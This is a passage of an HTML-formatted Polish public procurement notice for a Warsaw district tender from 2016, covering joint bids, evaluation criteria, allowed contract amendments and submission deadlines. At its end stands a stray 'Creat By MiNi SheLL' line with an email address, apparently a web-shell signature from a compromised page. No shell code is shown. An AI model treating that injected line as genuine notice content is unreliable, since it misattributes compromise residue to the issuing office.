- informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
b) dokumentów (wystawionych i podpisanych przez te podmioty) dotyczących 
w szczególności:  
- zakresu dostępnych Wykonawcy zasobów innego podmiotu, 
- sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
   wykonywaniu zamówienia, 
- charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 
- zakresu i okres udziału innego podmiotu przy wykonywaniu zamówienia. 

Zasady składania ofert wspólnych przez Wykonawców, o których mowa w art. 23 ustawy Prawo zamówień publicznych.
1)	W przypadku udziału w postępowaniu Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie o udzielenie zamówienia publicznego. Powyższe nie dotyczy wspólników spółki cywilnej, w przypadku, gdy każdy wspólnik jest umocowany do samodzielnego reprezentowania wspólników spółki cywilnej. (Szczegółowe zasady określone zostały w części IX SIWZ). 
2) Wykonawcy, którzy wspólnie ubiegają się o udzielenia zamówienia mogą łącznie spełniać warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
3)  W przypadku oferty składanej wspólnie przez kilku Wykonawców, warunek dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego 
w okolicznościach, o których mowa w art. 24 ust. 1 ustawy musi spełniać każdy 
z Wykonawców. (Oświadczenie i dokumenty o którym mowa w części V pkt 2 SIWZ składa każdy wykonawca).
4) Każdy z Wykonawców składających ofertę wspólnie przedkłada listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. 2007 r., Nr 50, poz. 331 ze zm.), albo informację o tym, że nie należy do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres rękojmi - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące odpowiednio zmniejszenia wartości zamówienia lub terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących okoliczności:
1)	w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, zagrażającego życiu lub zdrowiu ludzi,
2)	w następstwie wykraczających poza terminy określone w KPA procedur administracyjnych oraz innych terminów formalno-prawnych mających wpływ 
na terminy realizacji zamówienia,
3)	ujawnienia w trakcie robót urządzeń podziemnych, elementów instalacji, konstrukcji, których istnienie lub lokalizacja nie wynika z map uzbrojenia uzgodnionych przez ZUD lub dokumentacji projektowej,
4)	ograniczenia środków budżetowych przeznaczonych na realizację zamówienia,
5)	zmiany zakresu przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa,
6)	ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy,
7)	zmiany części zamówienia lub zgłoszenia udziału podwykonawcy lub dalszego podwykonawcy,
8)	zmiany podwykonawcy, jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, w celu wykazania spełniania warunków udziału w  postępowaniu. Wykonawca jest zobowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postepowania o udzielenie zamówienia,
9)	wyjątkowo niesprzyjających warunków pogodowych,
10)	w następstwie zaleceń wynikających z opinii ornitologicznej,
11)	działania siły wyższej.
2. Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące odpowiednio zmiany wartości zamówienia w przypadku zaistnienia jednej z następujących okoliczności:
1)	ustawowych zmian stawki podatku od towarów i usług VAT,
2)	ustawowych zmian zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki  składki na  ubezpieczenia społeczne lub zdrowotne,
3)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art.  2 ust. 
3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2015, poz. 2008, z 1.12.2015r.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srodmiescie.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 00-691 Warszawa, ul. Nowogrodzka 43, pok. nr 308. Opłata za formularz SIWZ wynosi 380,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 10:00, miejsce: 00-691 Warszawa, ul. Nowogrodzka 43, Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który 
w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, 
co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com